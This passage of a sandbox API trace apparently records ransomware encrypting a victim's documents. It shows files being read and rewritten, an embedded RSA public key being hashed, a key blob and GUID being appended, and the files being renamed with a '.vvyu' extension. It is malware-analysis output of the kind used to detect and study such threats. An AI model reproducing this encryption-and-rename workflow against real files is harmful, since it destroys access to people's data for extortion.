hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0189.527] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0189.528] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0189.528] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0189.528] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0189.528] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adfa00 | out: hHeap=0x2c0000) returned 1 [0189.528] WriteFile (in: hFile=0x584, lpBuffer=0x2af5168*, nNumberOfBytesToWrite=0x1874e, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2af5168*, lpNumberOfBytesWritten=0x2f9fb14*=0x1874e, lpOverlapped=0x0) returned 1 [0189.530] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af5168 | out: hHeap=0x2c0000) returned 1 [0189.530] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x18753, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0189.530] WriteFile (in: hFile=0x584, lpBuffer=0x2ae01d0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae01d0*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0189.530] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0189.530] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2eba0 [0189.530] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2af1f88 [0189.530] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2af1f88, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0189.530] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af23b8 [0189.531] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af1f88 | out: hHeap=0x2c0000) returned 1 [0189.531] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2eba0 | out: hHeap=0x2c0000) returned 1 [0189.531] WriteFile (in: hFile=0x584, lpBuffer=0x2af23b8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af23b8*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0189.531] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af23b8 | out: hHeap=0x2c0000) returned 1 [0189.532] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0189.532] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0189.532] CloseHandle (hObject=0x584) returned 1 [0189.534] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2eba0 [0189.534] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x870) returned 0x2af1f88 [0189.534] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2eba0 | out: hHeap=0x2c0000) returned 1 [0189.534] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\tCNlSe zbuiw.pptx" (normalized: "c:\\users\\keecfmwgj\\documents\\tcnlse zbuiw.pptx"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\tCNlSe zbuiw.pptx.vvyu" (normalized: "c:\\users\\keecfmwgj\\documents\\tcnlse zbuiw.pptx.vvyu")) returned 1 [0189.535] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af1f88 | out: hHeap=0x2c0000) returned 1 [0189.536] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0189.536] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0189.539] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0189.539] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd44e3630, ftCreationTime.dwHighDateTime=0x1d8a37b, ftLastAccessTime.dwLowDateTime=0xd958d360, ftLastAccessTime.dwHighDateTime=0x1d8a3a8, ftLastWriteTime.dwLowDateTime=0xd958d360, ftLastWriteTime.dwHighDateTime=0x1d8a3a8, nFileSizeHigh=0x0, nFileSizeLow=0x14d99, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WOYOdoVl_y_ELRl.ppt", cAlternateFileName="WOYODO~1.PPT")) returned 1 [0189.539] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2d58 [0189.539] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbcb0 [0189.539] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2d58 | out: hHeap=0x2c0000) returned 1 [0189.539] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\WOYOdoVl_y_ELRl.ppt") returned=".ppt" [0189.539] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\WOYOdoVl_y_ELRl.ppt" (normalized: "c:\\users\\keecfmwgj\\documents\\woyodovl_y_elrl.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0189.541] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=85401) returned 1 [0189.541] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0189.544] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x14d73, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0189.544] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0189.547] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0189.547] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0189.547] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0189.547] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0x14d99, lpOverlapped=0x0) returned 1 [0189.548] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0189.549] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0189.549] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0189.549] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0189.549] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b9f8) returned 1 [0189.550] CryptCreateHash (in: hProv=0x31b9f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0189.550] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0189.550] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0189.550] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0189.550] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0189.550] GetLastError () returned 0x0 [0189.550] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0189.551] CryptReleaseContext (hProv=0x31b9f8, dwFlags=0x0) returned 1 [0189.551] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0189.551] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0189.551] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0189.551] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0189.551] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0189.551] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0189.551] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0189.551] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14da0) returned 0x2af5168 [0189.552] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0189.553] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0189.553] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2adfa00 [0189.553] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0189.553] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0189.553] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0189.553] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2d58 [0189.553] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0db38 [0189.553] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2da0 [0189.553] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0db50 [0189.553] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0db80 [0189.553] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dbe0 [0189.553] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0db98 [0189.553] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0189.553] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0189.553] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aedfa0 [0189.553] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af1f88 [0189.553] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0db80 | out: hHeap=0x2c0000) returned 1 [0189.553] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0db98 | out: hHeap=0x2c0000) returned 1 [0189.554] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dbe0 | out: hHeap=0x2c0000) returned 1 [0189.554] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0189.554] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af1f88 | out: hHeap=0x2c0000) returned 1 [0189.554] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dbe0 [0189.554] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7db0 [0189.554] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0db98 [0189.554] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0189.554] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2a0db80 [0189.555] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7de0 [0189.555] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0189.555] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0189.555] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0189.555] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0189.555] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0189.555] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ac8 [0189.555] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0189.555] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0189.555] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0db98 | out: hHeap=0x2c0000) returned 1 [0189.555] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0189.556] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0db80 | out: hHeap=0x2c0000) returned 1 [0189.556] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0189.556] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0189.556] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dbe0 | out: hHeap=0x2c0000) returned 1 [0189.556] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0189.556] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0189.557] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aedfa0 | out: hHeap=0x2c0000) returned 1 [0189.557] GetCurrentThreadId () returned 0x5d8 [0189.557] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0189.557] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2ae4698 [0189.557] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42698 [0189.557] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0189.557] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0189.557] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0189.557] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0189.557] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0189.557] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0189.558] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0189.558] GetCurrentThreadId () returned 0x5d8 [0189.558] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0189.558] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0189.558] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0189.558] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0189.558] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0189.558] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0189.559] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0189.559] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0189.559] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae03e0 [0189.559] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0189.559] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40108 [0189.559] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0189.559] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae02d8 [0189.559] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0189.559] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dbe0 [0189.559] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0189.559] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0189.559] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0189.559] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0189.560] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0189.560] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0189.560] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0189.560] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0189.560] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0db80 [0189.560] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0189.560] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e00 [0189.560] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0189.560] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0189.560] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0189.560] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0189.560] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0189.560] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0db98 [0189.560] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0189.560] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0189.560] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0189.560] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0db68 [0189.560] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0189.560] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0dbf8 [0189.560] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0189.560] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e40 [0189.560] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0189.560] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dbc8 [0189.560] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0189.560] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dbb0 [0189.560] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0189.561] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0dc10 [0189.561] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dbb0 | out: hHeap=0x2c0000) returned 1 [0189.561] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0dbb0 [0189.561] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dbc8 | out: hHeap=0x2c0000) returned 1 [0189.561] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e10 [0189.561] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0189.561] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0189.561] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0189.561] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7ba8 [0189.561] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0db80 | out: hHeap=0x2c0000) returned 1 [0189.561] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0db80 [0189.561] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0189.561] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2af1f88 [0189.561] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dbe0 | out: hHeap=0x2c0000) returned 1 [0189.561] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0189.561] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dc10 | out: hHeap=0x2c0000) returned 1 [0189.561] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af2198 [0189.561] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0189.561] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0189.561] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0189.561] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0189.561] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0db80 | out: hHeap=0x2c0000) returned 1 [0189.561] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af23b0 [0189.562] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0189.562] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0189.562] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0189.562] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0189.563] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae03e0 | out: hHeap=0x2c0000) returned 1 [0189.563] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0189.563] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0189.563] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0189.564] HeapFree (in: hHeap=0x2c0000, 